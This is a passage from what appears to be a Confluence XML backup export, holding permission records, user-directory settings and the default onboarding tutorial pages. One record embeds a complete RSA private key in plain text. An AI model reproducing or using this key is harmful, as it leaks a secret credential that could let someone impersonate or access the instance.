<id name="id">65537</id>
|
||||
<property name="alias"><![CDATA[confluence:174556]]></property>
|
||||
<property name="key"><![CDATA[ RSA public MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEArOTFjqwSVsGy6FLWppvYB04deZb5FsAe8BwS2mub/YFUOmc61ia97mcHDaqPKyRrM7QlJUdAQXRWMqycZuumGUahSyC6xsxsQLHSPsf2f6f1naTdL4anPfvzWlYaAl+WAPydpY9ZkgWlxXxzbmvd8Av4Ay84P8qfCNdufpn9QshrV0F3ZODU4gCr2LJRd49eWGSpxUJDvL9MQNOrxtyaDb9r/mxZ48Ed0Fn+kBmLrBxryyC055I0dBIS+JKDQb3qbHymwBQ1qYPdR85BIO6ozYd4UQ1ZeaeKK4T/zn7nohlVyLlDhcfGW0SicxkGfXOiDl8YgaGZeJQXSiQeHTYRYwIDAQAB ]]></property>
|
||||
</object>
|
||||
<object class="SpacePermission" package="com.atlassian.confluence.security">
|
||||
<id name="id">458756</id>
|
||||
<property name="type"><![CDATA[USECONFLUENCE]]></property>
|
||||
<property name="group"><![CDATA[confluence-users]]></property>
|
||||
<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:18.397</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:04:18.397</property>
|
||||
</object>
|
||||
<object class="SpacePermission" package="com.atlassian.confluence.security">
|
||||
<id name="id">458757</id>
|
||||
<property name="type"><![CDATA[SYSTEMADMINISTRATOR]]></property>
|
||||
<property name="group"><![CDATA[confluence-administrators]]></property>
|
||||
<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:18.406</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:04:18.406</property>
|
||||
</object>
|
||||
<object class="SpacePermission" package="com.atlassian.confluence.security">
|
||||
<id name="id">458758</id>
|
||||
<property name="type"><![CDATA[PERSONALSPACE]]></property>
|
||||
<property name="group"><![CDATA[confluence-administrators]]></property>
|
||||
<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:18.410</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:04:18.410</property>
|
||||
</object>
|
||||
<object class="AliasedKey" package="com.atlassian.confluence.security.persistence.dao.hibernate">
|
||||
<id name="id">65538</id>
|
||||
<property name="alias"><![CDATA[confluence:174556]]></property>
|
||||
<property name="key"><![CDATA[ RSA private MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQCs5MWOrBJWwbLoUtamm9gHTh15lvkWwB7wHBLaa5v9gVQ6ZzrWJr3uZwcNqo8rJGsztCUlR0BBdFYyrJxm66YZRqFLILrGzGxAsdI+x/Z/p/WdpN0vhqc9+/NaVhoCX5YA/J2lj1mSBaXFfHNua93wC/gDLzg/yp8I125+mf1CyGtXQXdk4NTiAKvYslF3j15YZKnFQkO8v0xA06vG3JoNv2v+bFnjwR3QWf6QGYusHGvLILTnkjR0EhL4koNBvepsfKbAFDWpg91HzkEg7qjNh3hRDVl5p4orhP/OfueiGVXIuUOFx8ZbRKJzGQZ9c6IOXxiBoZl4lBdKJB4dNhFjAgMBAAECggEAM9D+moNcna7AyVsmZNmZNZtGPy4tqhFbVFf9mIOexSvRDA3rNsp2qvAqz4A6F1J7ZIwNg+4mRlexC8/qsffXGIUwCv2crL8QhJUmr1UrvdefR6dk+Pzwu6V6qiza77IpGVOchcWAMUDLDXR+fe4LHonfw0iQIaI+5p32SjAplK1QsFbUmcmNqDr+lBIord6xwRjqJJnN5scHfV3zPKn8boida508IaSrvpFBfEMcq77Mw0wPKzPFToKGkOaGAp2mRNBoz9j4vVvy0snOee51tRtlVPu1+Hp8q4nNbif8oJPc9eVjSO48kUOncIZmyx4HYc04UgYn5du66vnqbEbjGQKBgQDoUz/GFrP5zaWPB1AJZgeDUt8+3D9eH7C96J9Td3gaNsVsLgRHd98L8oQaTZxxSrKCAEFkroI15Sapa4HZ0klrWTmZWk0Z2nP8YsotPz345+Ywj4a9+m7+HBisDREt+vT8X3lV83B22/WyQf8dd8Bo1XBslve0H0c8S+8BB5C/aQKBgQC+gxw8gm55a95EFLMS3xDtuJTaUkqHm35k5Hd11G4wSetlTCVRKQ5ErnpSvTFH4f2n5Ke4CEdFFgqYIlnhIfzUYyfeeswcxokbwFnDiF8e76Uel0Asng8a0TbJEmGtrkCAW9cQSFX5gFx26VwT7BW2Tu6GzoY8pduq9h2ihTP86wKBgQCkBlKaSmEa1uQyjRkm6ZAYWaQgP2PF0l34VopWZZy39T+BVyPSSYGCb+BwqabwHarWOdPxf3uTDYw0RSDSZrNLRR1zddvFiwQkhqLzOxlH6IIOeubIrk06vx90KW2dpvbcT5Pc6RjX8ggPqKSza16/JSJQqG2OEB89JOdDNNIvMQKBgQCx/fDtn7bzfpJk7Sn5oatBTsjTyTqUw/Qs8z+hON3SA94IAEKFN2R7SsBCeTyHul6w8/K3ABUGOPeg98cdjhGXpSRkujnlUKBc6zNyegDU+HU+xXVRukLGfV1AMwpLqJfe1O9z6QFaYFEDUDeU7WfDsq8sB9xm4VcAvX0mkGjoDQKBgAiPqCJ/bRYhkbs4ZRRfioa5EfQG6oH9VEVHSXP4lG+wzRMjFKOvA+cosXlnZlkqTFzX2bFW2Hm582ikaY1AYHS/gGNPKoN5FRxR+4s3bZ4kQ2YRj1X6aTnE6cG5UWyzHKQXmxYSiLEbS1bofb1D8qaBVWhoJ74DcsfWCeY58gGT ]]></property>
|
||||
</object>
|
||||
<object class="SpacePermission" package="com.atlassian.confluence.security">
|
||||
<id name="id">458759</id>
|
||||
<property name="type"><![CDATA[CREATESPACE]]></property>
|
||||
<property name="group"><![CDATA[confluence-users]]></property>
|
||||
<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:18.415</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:04:18.415</property>
|
||||
</object>
|
||||
<object class="SpacePermission" package="com.atlassian.confluence.security">
|
||||
<id name="id">458753</id>
|
||||
<property name="type"><![CDATA[USECONFLUENCE]]></property>
|
||||
<property name="group"><![CDATA[confluence-administrators]]></property>
|
||||
<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:18.336</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:04:18.336</property>
|
||||
</object>
|
||||
<object class="SpacePermission" package="com.atlassian.confluence.security">
|
||||
<id name="id">458754</id>
|
||||
<property name="type"><![CDATA[PERSONALSPACE]]></property>
|
||||
<property name="group"><![CDATA[confluence-users]]></property>
|
||||
<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:18.391</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:04:18.391</property>
|
||||
</object>
|
||||
<object class="SpacePermission" package="com.atlassian.confluence.security">
|
||||
<id name="id">458755</id>
|
||||
<property name="type"><![CDATA[ADMINISTRATECONFLUENCE]]></property>
|
||||
<property name="group"><![CDATA[confluence-administrators]]></property>
|
||||
<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:18.394</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:04:18.394</property>
|
||||
</object>
|
||||
<object class="DirectoryImpl" package="com.atlassian.crowd.model.directory">
|
||||
<id name="id">360449</id>
|
||||
<property name="name"><![CDATA[Confluence Internal Directory]]></property>
|
||||
<property name="lowerName"><![CDATA[confluence internal directory]]></property>
|
||||
<property name="createdDate">2023-11-09 06:04:18.127</property>
|
||||
<property name="updatedDate">2023-11-09 06:04:18.127</property>
|
||||
<property name="active">true</property>
|
||||
<property name="description"><![CDATA[Confluence default internal directory]]></property>
|
||||
<property name="implementationClass"><![CDATA[com.atlassian.crowd.directory.InternalDirectory]]></property>
|
||||
<property name="lowerImplementationClass"><![CDATA[com.atlassian.crowd.directory.internaldirectory]]></property>
|
||||
<property name="type" enum-class="DirectoryType" package="com.atlassian.crowd.embedded.api">INTERNAL</property>
|
||||
<collection name="allowedOperations" class="java.util.Set"><element enum-class="OperationType" package="com.atlassian.crowd.embedded.api">UPDATE_GROUP_ATTRIBUTE</element>
|
||||
<element enum-class="OperationType" package="com.atlassian.crowd.embedded.api">CREATE_ROLE</element>
|
||||
<element enum-class="OperationType" package="com.atlassian.crowd.embedded.api">DELETE_USER</element>
|
||||
<element enum-class="OperationType" package="com.atlassian.crowd.embedded.api">UPDATE_ROLE_ATTRIBUTE</element>
|
||||
<element enum-class="OperationType" package="com.atlassian.crowd.embedded.api">UPDATE_USER</element>
|
||||
<element enum-class="OperationType" package="com.atlassian.crowd.embedded.api">UPDATE_USER_ATTRIBUTE</element>
|
||||
<element enum-class="OperationType" package="com.atlassian.crowd.embedded.api">UPDATE_GROUP</element>
|
||||
<element enum-class="OperationType" package="com.atlassian.crowd.embedded.api">CREATE_USER</element>
|
||||
<element enum-class="OperationType" package="com.atlassian.crowd.embedded.api">DELETE_ROLE</element>
|
||||
<element enum-class="OperationType" package="com.atlassian.crowd.embedded.api">CREATE_GROUP</element>
|
||||
<element enum-class="OperationType" package="com.atlassian.crowd.embedded.api">DELETE_GROUP</element>
|
||||
<element enum-class="OperationType" package="com.atlassian.crowd.embedded.api">UPDATE_ROLE</element>
|
||||
</collection>
|
||||
<collection name="attributes" class="java.util.Map"><element name="user_encryption_method" type="string"><![CDATA[atlassian-security]]></element>
|
||||
</collection>
|
||||
</object>
|
||||
<object class="ApplicationImpl" package="com.atlassian.crowd.model.application">
|
||||
<id name="id">327681</id>
|
||||
<property name="name"><![CDATA[crowd-embedded]]></property>
|
||||
<property name="lowerName"><![CDATA[crowd-embedded]]></property>
|
||||
<property name="createdDate">2023-11-09 06:04:18.083</property>
|
||||
<property name="updatedDate">2023-11-09 06:04:18.165</property>
|
||||
<property name="active">true</property>
|
||||
<property name="description"/><property name="type" enum-class="ApplicationType" package="com.atlassian.crowd.model.application">GENERIC_APPLICATION</property>
|
||||
<component name="credential"><property name="credential" type="string"><![CDATA[X]]></property>
|
||||
</component>
|
||||
<collection name="attributes" class="java.util.Map"><element name="com.sun.jndi.ldap.connect.pool.initsize" type="string"><![CDATA[1]]></element>
|
||||
<element name="atlassian_sha1_applied" type="string"><![CDATA[true]]></element>
|
||||
<element name="com.sun.jndi.ldap.connect.pool.timeout" type="string"><![CDATA[30000]]></element>
|
||||
<element name="com.sun.jndi.ldap.connect.pool.authentication" type="string"><![CDATA[simple]]></element>
|
||||
<element name="com.sun.jndi.ldap.connect.pool.maxsize" type="string"><![CDATA[0]]></element>
|
||||
<element name="com.sun.jndi.ldap.connect.pool.prefsize" type="string"><![CDATA[10]]></element>
|
||||
<element name="aggregateMemberships" type="string"><![CDATA[true]]></element>
|
||||
<element name="com.sun.jndi.ldap.connect.pool.protocol" type="string"><![CDATA[plain ssl]]></element>
|
||||
</collection>
|
||||
<collection name="directoryMappings" class="java.util.List"><element class="DirectoryMapping" package="com.atlassian.crowd.model.application"><id name="id">393217</id>
|
||||
</element>
|
||||
</collection>
|
||||
</object>
|
||||
<object class="BodyContent" package="com.atlassian.confluence.core">
|
||||
<id name="id">163844</id>
|
||||
<property name="body"><![CDATA[<ac:layout><ac:layout-section ac:type="single"><ac:layout-cell><p><span style="color: rgb(64,64,64);">Confluence automatically transforms linked content</span> <span style="color: rgb(64,64,64);">into rich content.</span> <span style="color: rgb(64,64,64);">Try it with Confluence pages, JIRA issues, YouTube and Vimeo videos, <br /></span><span style="color: rgb(64,64,64);">Flickr photo streams, Tweets, Google maps and many more.</span></p><p><span style="color: rgb(64,64,64);">Here's two examples of autoconvert in action.</span></p></ac:layout-cell></ac:layout-section><ac:layout-section ac:type="two_equal"><ac:layout-cell><h3> <br /><ac:structured-macro ac:name="widget" ac:schema-version="1" ac:macro-id="e115eec2-dcf7-445c-b563-aca39824d38e"><ac:parameter ac:name="url"><ri:url ri:value="http://youtube.com/watch?v=RXhL9cfwx2c" /></ac:parameter></ac:structured-macro></h3></ac:layout-cell><ac:layout-cell><p><span style="color: rgb(0,0,0);"> <ac:structured-macro ac:name="widget" ac:schema-version="1" ac:macro-id="6f0d84bb-46ee-40a0-8379-fb9a87faf7c7"><ac:parameter ac:name="url"><ri:url ri:value="https://maps.google.com/maps?q=Atlassian,+George+Street,+New+South+Wales,+Australia&hl=en&ll=-33.866572,151.207001&spn=0.004321,0.008256&sll=-33.870509,151.203707&sspn=0.008641,0.016512&oq=atlassian,&hq=Atlassian,+George+Street,+New+South+Wales,+Australia&radius=15000&t=m&z=18&iwloc=A" /></ac:parameter></ac:structured-macro> </span></p></ac:layout-cell></ac:layout-section><ac:layout-section ac:type="two_equal"><ac:layout-cell><h3><span style="color: rgb(51,51,51);">Try it yourself:</span></h3><ol><li><span> <span> <span style="color: rgb(51,51,51);"> <span> <strong>Edit</strong> this page.</span> </span> </span> </span></li><li><span> <span> <span style="color: rgb(51,51,51);"> <span>Copy this link <a href="https://youtu.be/RXhL9cfwx2c">https://youtu.be/RXhL9cfwx2c</a> and paste it onto the page.</span> <br /></span> </span> </span></li><li><span style="color: rgb(51,51,51);">Autoconvert will embed the YouTube video on the page.</span></li><li><span style="color: rgb(51,51,51);">Save the page. <br /></span></li></ol></ac:layout-cell><ac:layout-cell><h3><span style="color: rgb(51,51,51);"> <span style="color: rgb(51,51,51);">Try it yourself</span>:</span></h3><ol><li><strong>Edit</strong> this page.</li><li>Copy this link <a href="https://maps.google.com/maps?q=Atlassian,+George+Street,+New+South+Wales,+Australia&hl=en&ll=-33.866572,151.207001&spn=0.004321,0.008256&sll=-33.870509,151.203707&sspn=0.008641,0.016512&oq=atlassian,&hq=Atlassian,+George+Street,+New+South+Wales,+Australia&radius=15000&t=m&z=18&iwloc=A">https://maps.google.com/maps?q=Atlassian,+George+Street,+New+South+Wales,+Australia&hl=en&ll=-33.866572,151.207001&spn=0.004321,0.008256&sll=-33.870509,151.203707&sspn=0.008641,0.016512&oq=atlassian,&hq=Atlassian,+George+Street,+New+South+Wales,+Australia&radius=15000&t=m&z=18&iwloc=A</a> and paste it onto the page. </li><li>Autoconvert will render the Google Maps view on the page.</li><li><span style="color: rgb(51,51,51);">Save the page. <br /></span></li></ol></ac:layout-cell></ac:layout-section><ac:layout-section ac:type="single"><ac:layout-cell><h1 style="text-align: center;"><span style="color: rgb(51,51,51);"> <br /></span></h1><h1 style="text-align: center;"><span style="color: rgb(51,51,51);"> <ac:link><ri:page ri:content-title="Lay out your page (step 6 of 9)" /><ac:link-body><ac:image><ri:attachment ri:filename="prev.jpg"><ri:page ri:content-title="Let's edit this page (step 3 of 9)" /></ri:attachment></ac:image></ac:link-body></ac:link> <ac:link><ri:page ri:content-title="Welcome to Confluence" /><ac:link-body><ac:image><ri:attachment ri:filename="home.jpg"><ri:page ri:content-title="Let's edit this page (step 3 of 9)" /></ri:attachment></ac:image></ac:link-body></ac:link> <ac:link><ri:page ri:content-title="Tell people what you think in a comment (step 8 of 9)" /><ac:link-body><ac:image><ri:attachment ri:filename="next.jpg"><ri:page ri:content-title="Let's edit this page (step 3 of 9)" /></ri:attachment></ac:image></ac:link-body></ac:link> </span></h1><p><span style="color: rgb(51,51,51);"> <br /></span></p></ac:layout-cell></ac:layout-section></ac:layout>]]></property>
|
||||
<property name="content" class="Page" package="com.atlassian.confluence.pages"><id name="id">98314</id>
|
||||
</property>
|
||||
<property name="bodyType">2</property>
|
||||
</object>
|
||||
<object class="BodyContent" package="com.atlassian.confluence.core">
|
||||
<id name="id">163845</id>
|
||||
<property name="body"><![CDATA[<p><span style="color: rgb(64,64,64);"><br /></span></p><p><span style="color: rgb(64,64,64);">Once you've created content you'll want to share it with your team members. <br /></span><span style="color: rgb(64,64,64);">Confluence can do all the work for you, just click the <strong>Share</strong> button.<br /></span></p><p style="margin-left: 30.0px;"><span style="color: rgb(64,64,64);"><span style="color: rgb(64,64,64);"><br /></span></span></p><ol><li>Let's tell someone about this page. <br />Click the <strong>Share</strong> button at the top right of the page. It looks like this:<br /><br /><ac:image ac:width="379"><ri:attachment ri:filename="step09-01.png" /></ac:image><br /> </li><li>Type the name of the person or group you want to share the page with. <br />You can also enter an email address. <br /><br /></li><li>Add a message to give the person some background about the page.<br /><br /></li><li>Click the <strong>Share</strong> button. <br />Confluence will send the person an email message about this page. Shared!</li></ol><p> </p><p><img class="emoticon emoticon-warning" title="(warning)" src="http://localhost:8090/s/en_GB/7502/10587128b0de2a71f82b5acc129b8b5611829c93/_/images/icons/emoticons/warning.png" alt="(warning)" border="0" /><span style="color: rgb(64,64,64);"> If your administrator has not added a mail server, the </span><strong>Share</strong><span style="color: rgb(64,64,64);"> button will only show the share link.<br /></span></p><h1 style="text-align: center;"><span style="color: rgb(51,51,51);"><ac:link><ri:page ri:content-title="Tell people what you think in a comment (step 8 of 9)" /><ac:link-body><ac:image><ri:attachment ri:filename="prev.jpg"><ri:page ri:content-title="Let's edit this page (step 3 of 9)" /></ri:attachment></ac:image></ac:link-body></ac:link> <ac:link><ri:page ri:content-title="Welcome to Confluence" /><ac:link-body><ac:image><ri:attachment ri:filename="home.jpg"><ri:page ri:content-title="Let's edit this page (step 3 of 9)" /></ri:attachment></ac:image></ac:link-body></ac:link> </span></h1><p style="margin-left: 30.0px;"><span style="color: rgb(51,51,51);"><br /></span></p>]]></property>
|
||||
<property name="content" class="Page" package="com.atlassian.confluence.pages"><id name="id">98306</id>
|
||||
</property>
|
||||
<property name="bodyType">2</property>
|
||||
</object>
|
||||
<object class="BodyContent" package="com.atlassian.confluence.core">
|
||||
<id name="id">163846</id>
|
||||
<property name="body"><![CDATA[<ac:layout><ac:layout-section ac:type="single"><ac:layout-cell><p style="margin-left: 60.0px;"><br /></p><p>Insert tables with drag and drop simplicity. <br />Add, remove, cut, and paste rows and columns – this makes working with tables easy. <br /> </p></ac:layout-cell></ac:layout-section><ac:layout-section ac:type="two_right_sidebar"><ac:layout-cell><ol><li><span style="color: rgb(51,51,51);"><strong>Edit</strong> the page.<br /> <br /></span></li><li><span style="color: rgb(51,51,51);">Click in the right-hand column to position your cursor.<br /> <br /></span></li><li>Click the <strong>Table</strong> menu on the toolbar and drag to choose the size of your table. <br /><br /><ac:image ac:thumbnail="true" ac:width="225"><ri:attachment ri:filename="step05-01.png" /></ac:image><br /> </li><li>The table toolbar appears when there is table on your page.<br /><br /></li><li>Place your cursor in the first cell of the table and add a row below it.<br /><br /><ac:image ac:thumbnail="true" ac:width="160"><ri:attachment ri:filename="step05-03.png" /></ac:image><br /><br /></li><li>Place your cursor in any cell of the last column of the table and delete the column.<br /><br /><ac:image ac:thumbnail="true" ac:width="160"><ri:attachment ri:filename="step05-04.png" /></ac:image><br /> </li><li>Grab one of the column borders and drag to resize the column.<br /><br /></li><li><span style="line-height: 1.42857;">Click </span><strong style="line-height: 1.42857;">Update </strong><span style="line-height: 1.42857;">to publish your changes to the page.</span></li></ol></ac:layout-cell><ac:layout-cell><p><br /></p></ac:layout-cell></ac:layout-section><ac:layout-section ac:type="single"><ac:layout-cell><h1 style="text-align: center;"><span style="color: rgb(51,51,51);"><br /></span></h1><h1 style="text-align: center;"><span style="color: rgb(51,51,51);"><ac:link><ri:page ri:content-title="Prettify the page with an image (step 4 of 9)" /><ac:link-body><ac:image><ri:attachment ri:filename="prev.jpg"><ri:page ri:content-title="Let's edit this page (step 3 of 9)" /></ri:attachment></ac:image></ac:link-body></ac:link> <ac:link><ri:page ri:content-title="Welcome to Confluence" /><ac:link-body><ac:image><ri:attachment ri:filename="home.jpg"><ri:page ri:content-title="Let's edit this page (step 3 of 9)" /></ri:attachment></ac:image></ac:link-body></ac:link> <ac:link><ri:page ri:content-title="Lay out your page (step 6 of 9)" /><ac:link-body><ac:image><ri:attachment ri:filename="next.jpg"><ri:page ri:content-title="Let's edit this page (step 3 of 9)" /></ri:attachment></ac:image></ac:link-body></ac:link></span></h1></ac:layout-cell></ac:layout-section></ac:layout>]]></property>
|
||||
<property name="content" class="Page" package="com.atlassian.confluence.pages"><id name="id">98332</id>
|
||||
</property>
|
||||
<property name="bodyType">2</property>
|
||||
</object>
|
||||
<object class="BodyContent" package="com.atlassian.confluence.core">
|
||||
<id name="id">163847</id>
|
||||
<property name="body"><![CDATA[<p><br />You can start a discussion by simply leaving a comment on a page, like this one.</p><p>Why not give it a try?</p><p>Go to the bottom of this page and start typing in the comment area. When you're finished just press save! </p><p>Don't just confine your comments to the bottom of the page - highlight some text on the page to add an inline comment like this:</p><p><br /></p><p><ac:image ac:width="417"><ri:attachment ri:filename="Step8-01.png" /></ac:image></p><p><br /></p><p><strong>Hint:</strong> You can mention another user in a page or comment by typing @ and then the user's name. <br />The user will be notified that you mentioned them.</p><h1 style="text-align: center;"><span style="color: rgb(51,51,51);"><br /></span></h1><h1 style="text-align: center;"><span style="color: rgb(51,51,51);"><br /></span></h1><h1 style="text-align: center;"><ac:link><ri:page ri:content-title="Learn the wonders of autoconvert (step 7 of 9)" /><ac:link-body><ac:image ac:height="40" ac:width="106"><ri:attachment ri:filename="prev.jpg"><ri:page ri:content-title="Let's edit this page (step 3 of 9)" /></ri:attachment></ac:image></ac:link-body></ac:link> <ac:link><ri:page ri:content-title="Welcome to Confluence" /><ac:link-body><ac:image><ri:attachment ri:filename="home.jpg"><ri:page ri:content-title="Let's edit this page (step 3 of 9)" /></ri:attachment></ac:image></ac:link-body></ac:link> <ac:link><ri:page ri:content-title="Share your page with a team member (step 9 of 9)" /><ac:link-body><ac:image><ri:attachment ri:filename="next.jpg"><ri:page ri:content-title="Let's edit this page (step 3 of 9)" /></ri:attachment></ac:image></ac:link-body></ac:link></h1><p><span style="color: rgb(51,51,51);"><br /></span></p>]]></property>
|
||||
<property name="content" class="Page" package="com.atlassian.confluence.pages"><id name="id">98305</id>
|
||||
</property>
|
||||
<property name="bodyType">2</property>
|
||||
</object>
|
||||
<object class="BodyContent" package="com.atlassian.confluence.core">
|
||||
<id name="id">163848</id>
|
||||
<property name="body"><![CDATA[<p>Page layouts provide structure in your page — two-column, three-column, and more — making it easy for anyone to create beautiful pages.</p><p> </p><ol><li><span style="color: rgb(51,51,51);"><strong>Edit</strong> the page.<br /> </span></li><li><span style="color: rgb(51,51,51);">Click the <strong>Page Layout</strong></span> button in the editor toolbar. It looks like this:<br /><br /><ac:image ac:thumbnail="true" ac:width="160"><ri:attachment ri:filename="step06-image01.png" /></ac:image><br /><span style="color: rgb(51,51,51);"><br /> </span>A section is added to your page, dotted lines indicate the section boundaries. <br /> </li><li>Choose a <strong>column layout</strong> to apply to your section, for example two columns. <br /><br /><ac:image ac:width="308"><ri:attachment ri:filename="step06-image02.png" /></ac:image> <br /> </li><li><span style="color: rgb(51,51,51);">Click the <strong>Add section</strong> button to add another section to the page. <br /><br /><ac:image ac:width="385"><ri:attachment ri:filename="step06-image03.png" /></ac:image><br /> </span></li><li><span style="color: rgb(51,51,51);">Choose a different <strong>column layout</strong> for this section. <br /><br /></span></li><li>Click <strong>Update </strong>to publish your changes to the page.</li></ol><p><span>You can add as many sections as you need, and each section can have a different column layout. </span></p><h1 style="text-align: center;"><span style="color: rgb(51,51,51);"><br /></span></h1><h1 style="text-align: center;"><span style="color: rgb(51,51,51);"><ac:link><ri:page ri:content-title="Get serious with a table (step 5 of 9)" /><ac:link-body><ac:image><ri:attachment ri:filename="prev.jpg"><ri:page ri:content-title="Let's edit this page (step 3 of 9)" /></ri:attachment></ac:image></ac:link-body></ac:link> <ac:link><ri:page ri:content-title="Welcome to Confluence" /><ac:link-body><ac:image><ri:attachment ri:filename="home.jpg"><ri:page ri:content-title="Let's edit this page (step 3 of 9)" /></ri:attachment></ac:image></ac:link-body></ac:link> <ac:link><ri:page ri:content-title="Learn the wonders of autoconvert (step 7 of 9)" /><ac:link-body><ac:image><ri:attachment ri:filename="next.jpg"><ri:page ri:content-title="Let's edit this page (step 3 of 9)" /></ri:attachment></ac:image></ac:link-body></ac:link></span></h1>]]></property>
|
||||
<property name="content" class="Page" package="com.atlassian.confluence.pages"><id name="id">98321</id>
|
||||
</property>
|
||||
<property name="bodyType">2</property>
|
||||
</object>
|
||||
<object class="BodyContent" package="com.atlassian.confluence.core">
|
||||
<id name="id">163849</id>
|
||||
<property name="body"><![CDATA[<p><br /></p><p>Let's start with the editor. You'll use the Confluence editor to <strong>create</strong> and <strong>edit</strong> pages.<br />You can type in the editor as you would in any document, apply formatting, and embed other content and files into the page.</p><p>The editor looks like this <span style="color: rgb(153,153,153);">(click images for a larger view)</span>:</p><p><br /></p><p><ac:image ac:width="511"><ri:attachment ri:filename="step-2-image-1.png" /></ac:image></p><p><br /></p><p><span>Here is a description of the components:</span></p><ol><li><h4><span style="color: rgb(0,0,0);">Editor toolbar</span></h4><span style="color: rgb(51,51,51);">The editor toolbar provides tools to format and color page content, create lists and tables, indent and align text, and insert other content into the page such as symbols, links, images, multimedia files, and macros.<br /><br /></span><ac:image ac:width="870"><ri:attachment ri:filename="step-2-image-3.png" /></ac:image><br /><br /></li><li><h4><span style="color: rgb(0,0,0);">Page content</span></h4><span style="color: rgb(51,51,51);">This is where you and your team will type the content for your page. You can also drag attachments from your desktop here.<br /></span>If other people are editing the page at the same time, you'll see their changes in real time! <br /><br /><br /></li><li><h4><span style="color: rgb(0,0,0);">Publish or close</span></h4><span style="color: rgb(0,0,0);">We're saving all the time in the editor. Once you're ready, hit <strong>publish</strong> to publish your page so others can see the changes, or <strong>close</strong> to finish editing later.<br /><br /><ac:image ac:width="800"><ri:attachment ri:filename="step-2-image-5.png" /></ac:image></span><br /><br /></li></ol><h1 style="text-align: center;"><span style="color: rgb(51,51,51);"><br /></span></h1><h1 style="text-align: center;"><span style="color: rgb(51,51,51);"><ac:link><ri:page ri:content-title="What is Confluence? (step 1 of 9)" /><ac:link-body><ac:image><ri:attachment ri:filename="prev.jpg"><ri:page ri:content-title="Let's edit this page (step 3 of 9)" /></ri:attachment></ac:image></ac:link-body></ac:link> <ac:link><ri:page ri:content-title="Welcome to Confluence" /><ac:link-body><ac:image><ri:attachment ri:filename="home.jpg"><ri:page ri:content-title="Let's edit this page (step 3 of 9)" /></ri:attachment></ac:image></ac:link-body></ac:link> <ac:link><ri:page ri:content-title="Let's edit this page (step 3 of 9)" /><ac:link-body><ac:image><ri:attachment ri:filename="next.jpg"><ri:page ri:content-title="Let's edit this page (step 3 of 9)" /></ri:attachment></ac:image></ac:link-body></ac:link></span></h1><p><span style="color: rgb(51,51,51);"><br /></span></p>]]></property>
|
||||
<property name="content" class="Page" package="com.atlassian.confluence.pages"><id name="id">98322</id>
|
||||
</property>
|
||||
<property name="bodyType">2</property>
|
||||
</object>
|
||||
<object class="BodyContent" package="com.atlassian.confluence.core">
|
||||
<id name="id">163850</id>
|
||||
<property name="body"><![CDATA[<ac:layout><ac:layout-section ac:type="single"><ac:layout-cell><p style="margin-left: 60.0px;"> </p><p><span style="color: rgb(51,51,51);">The Confluence editor helps you create content, fast. </span><span style="color: rgb(51,51,51);">You can embed images, Office documents, and even videos. <br />That's just the tip of the iceberg when it comes to creating useful content for your team. <br /> </span></p></ac:layout-cell></ac:layout-section><ac:layout-section ac:type="two_right_sidebar"><ac:layout-cell><ol><li style="text-align: left;"><strong>Edit</strong> the page.<br /><br /></li><li style="text-align: left;">Click in the right-hand column to position your cursor.<br /><br /></li><li style="text-align: left;">Click <strong style="text-align: left;">Files</strong> on the editor toolbar. It looks like this:<br /><br /><ac:image ac:width="301"><ri:attachment ri:filename="step04-01.png" /></ac:image><br /> </li><li style="text-align: left;"><span>The Files dialog shows you the files attached to this page. <br />Select the image named <strong>Confluence Origami Necktie</strong>.<br /> <br /></span></li><li style="text-align: left;">Click <strong>Insert</strong>.<br /><br /></li><li style="text-align: left;"><span style="color: rgb(51,51,51);">You will return to this page, and see the 'Image Properties Panel'. If you don't see it, click the image.<br /> <br /></span></li><li style="text-align: left;"><span style="color: rgb(51,51,51);">Resize the image by clicking on the square buttons or entering a width.<br /><br /><ac:image ac:width="540"><ri:attachment ri:filename="step04-02.png" /></ac:image><br /> <br /></span><span style="color: rgb(51,51,51);"><br /></span></li><li style="text-align: left;"><span>Click <strong>Properties </strong>and then select the <strong>Curl Shadow</strong> option from the Image Effects dialog. <br /> <br /></span></li><li style="text-align: left;"><span style="color: rgb(51,51,51);">Your image should look like this when completed:<br /><ac:image ac:queryparams="effects=border-simple,shadow-kn" ac:thumbnail="true" ac:width="300"><ri:attachment ri:filename="Confluence-Origami-Necktie.jpeg" /></ac:image><br /> </span></li><li style="text-align: left;"><span style="line-height: 1.42857;">Click </span><strong style="line-height: 1.42857;">Update </strong><span style="line-height: 1.42857;">to publish your changes to the page.</span><br /><br /></li><li style="text-align: left;">View the image on the page, or click to preview the file.</li></ol><p style="text-align: left;">The Files button is not just for images, you can insert and preview a wide range of files, including Microsoft Office documents and PDFs.</p></ac:layout-cell><ac:layout-cell><p> </p></ac:layout-cell></ac:layout-section><ac:layout-section ac:type="single"><ac:layout-cell><h1 style="text-align: center;"><span style="color: rgb(51,51,51);"><br /></span></h1><h1 style="text-align: center;"><span style="color: rgb(51,51,51);"><ac:link><ri:page ri:content-title="Let's edit this page (step 3 of 9)" /><ac:link-body><ac:image><ri:attachment ri:filename="prev.jpg"><ri:page ri:content-title="Let's edit this page (step 3 of 9)" /></ri:attachment></ac:image></ac:link-body></ac:link> <ac:link><ri:page ri:content-title="Welcome to Confluence" /><ac:link-body><ac:image><ri:attachment ri:filename="home.jpg"><ri:page ri:content-title="Let's edit this page (step 3 of 9)" /></ri:attachment></ac:image></ac:link-body></ac:link> <ac:link><ri:page ri:content-title="Get serious with a table (step 5 of 9)" /><ac:link-body><ac:image><ri:attachment ri:filename="next.jpg"><ri:page ri:content-title="Let's edit this page (step 3 of 9)" /></ri:attachment></ac:image></ac:link-body></ac:link></span></h1><p><span style="color: rgb(51,51,51);"><br /></span></p></ac:layout-cell></ac:layout-section></ac:layout>]]></property>
|
||||
